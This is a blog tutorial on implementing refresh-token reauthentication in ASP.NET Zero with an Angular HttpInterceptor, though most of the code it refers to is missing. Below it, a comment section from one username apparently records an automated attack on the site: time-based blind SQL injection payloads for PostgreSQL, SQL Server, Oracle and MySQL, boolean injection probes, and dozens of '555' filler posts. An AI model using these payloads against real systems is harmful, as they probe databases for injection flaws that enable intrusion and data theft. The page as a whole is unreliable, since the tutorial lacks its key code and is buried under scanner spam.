In this article, I will show you how to integrate the refresh token mechanism to the ASP.NET Zero project.
We use Angular HttpInterceptor
to handle requests. And I will implement how to use refresh tokens using Interceptor.
As a summary, the HttpInterceptor works as a middleware between each requests and server. As a default, all your requests enter the HttpInterceptor’s intercept method. And then you can handle the request and release it to the next handler. Our interceptor will work as shown in the below diagram.
Before each request:
- Handle request(add auth header etc.) and call server with that request. And subscribe to result.
After getting a response:
- Check if it is a HTTP 401(unauthorized) result
- If it is not, pass it to next handler
- If it is HTTP 401:
- Check whether if there is an ongoing reauthentication with the refresh token process.
- If there is, store requests and wait for the auth result.
- Else, try to authenticate with refresh token (If refresh token exists)
- If you can auth with a refresh token, store new tokens
- Call previous requests which you have got HTTP 401 error.
- If there are any stored requests call them with new auth token.
Implementation
We use the abp-ng2-module
package in Angular projects. It has basic implementations that we may need while developing our Angular projects. We use Angular HttpInterceptor
to handle requests (adding our headers, handling errors, etc…) and it’s located in the abp-ng2-module
package.
Check it out on GitHub: https://github.com/aspnetboilerplate/abp-ng2-module/blob/master/projects/abp-ng2-module/src/lib/interceptors/abpHttpInterceptor.ts
We use that interceptor in the ASP.NET Zero project.
Let’s start coding.
Since we have two seperate projects and our interceptor don’t know about a client I create abstract service which responsible for authorization with refresh token (if it exists).
Our interceptor was as seen below
What we need to do is; catch errors on requests and handle it, so we can change the intercept method as seen below
The abp-ng2-module
package is now ready to use with the refresh token. Time to update ASP.NET Zero.
I updated abp-ng2-module
packages on zero and created a service called ‘ZeroRefreshTokenService’ at the relevant location.
Finally, I have added my token service to the providers of my module.
@NgModule({
...
providers:[
...
{ provide: RefreshTokenService, useClass: ZeroRefreshTokenService}
]
})
As you see below, GetEditionComboboxItem
, GetTenants
actions are called and we get HTTP401 unauthorized results, then our interceptor calls RefreshToken
action and successfully gets the new token. Then it recalls all the unauthorizated requests with the new token.
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
1
YeaakEMl 1 months ago
@@5Na7W
YeaakEMl 1 months ago
1'"
YeaakEMl 1 months ago
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
YeaakEMl 1 months ago
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
YeaakEMl 1 months ago
QYSQFIQd')) OR 29=(SELECT 29 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
DE6mfsrD') OR 154=(SELECT 154 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
5FY4DFCY' OR 228=(SELECT 228 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
-1)) OR 278=(SELECT 278 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
-5) OR 840=(SELECT 840 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
-5 OR 99=(SELECT 99 FROM PG_SLEEP(15))--
YeaakEMl 1 months ago
KDCCWOS8')); waitfor delay '0:0:15' --
YeaakEMl 1 months ago
xmJiun7C'); waitfor delay '0:0:15' --
YeaakEMl 1 months ago
bZz0S6Sm'; waitfor delay '0:0:15' --
YeaakEMl 1 months ago
1 waitfor delay '0:0:15' --
YeaakEMl 1 months ago
-1)); waitfor delay '0:0:15' --
YeaakEMl 1 months ago
-1); waitfor delay '0:0:15' --
YeaakEMl 1 months ago
-1; waitfor delay '0:0:15' --
YeaakEMl 1 months ago
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
YeaakEMl 1 months ago
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
YeaakEMl 1 months ago
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
YeaakEMl 1 months ago
if(now()=sysdate(),sleep(15),0)
YeaakEMl 1 months ago
-1' OR 3*2<(0+5+507-507) or 'jM0uQ00f'='
YeaakEMl 1 months ago
-1' OR 3+507-507-1=0+0+0+1 or 'jM0uQ00f'='
YeaakEMl 1 months ago
-1' OR 2+507-507-1=0+0+0+1 or 'jM0uQ00f'='
YeaakEMl 1 months ago
-1' OR 3*2>(0+5+763-763) --
YeaakEMl 1 months ago
-1' OR 3*2<(0+5+763-763) --
YeaakEMl 1 months ago
-1' OR 3+763-763-1=0+0+0+1 --
YeaakEMl 1 months ago
-1' OR 2+763-763-1=0+0+0+1 --
YeaakEMl 1 months ago
-1 OR 3*2>(0+5+927-927) --
YeaakEMl 1 months ago
-1 OR 3*2<(0+5+927-927) --
YeaakEMl 1 months ago
-1 OR 3+927-927-1=0+0+0+1 --
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555
YeaakEMl 1 months ago
555